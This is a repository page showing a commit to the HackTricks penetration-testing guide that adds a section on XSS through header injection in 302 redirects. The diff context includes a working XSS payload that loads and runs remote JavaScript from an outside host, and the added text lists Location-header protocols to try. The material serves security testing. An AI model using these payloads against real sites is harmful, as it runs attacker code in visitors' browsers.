0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] one page modified

This commit is contained in:
CPol 2020-10-16 10:44:40 +00:00 committed by gitbook-bot
parent 8d3ae0eb1d
commit 202b5b7c92
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -476,6 +476,13 @@ A XSS occurs.
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
```
### XSS with header injection in a 302 response
If you find that you can **inject headers in a 302 Redirect response** you could try to **make the browser execute arbitrary JavaScript**. This is **not trivial** as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless.
In [**this report**](https://www.gremwell.com/firefox-xss-302) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.
Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
### Obfuscation & Advanced Bypass
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)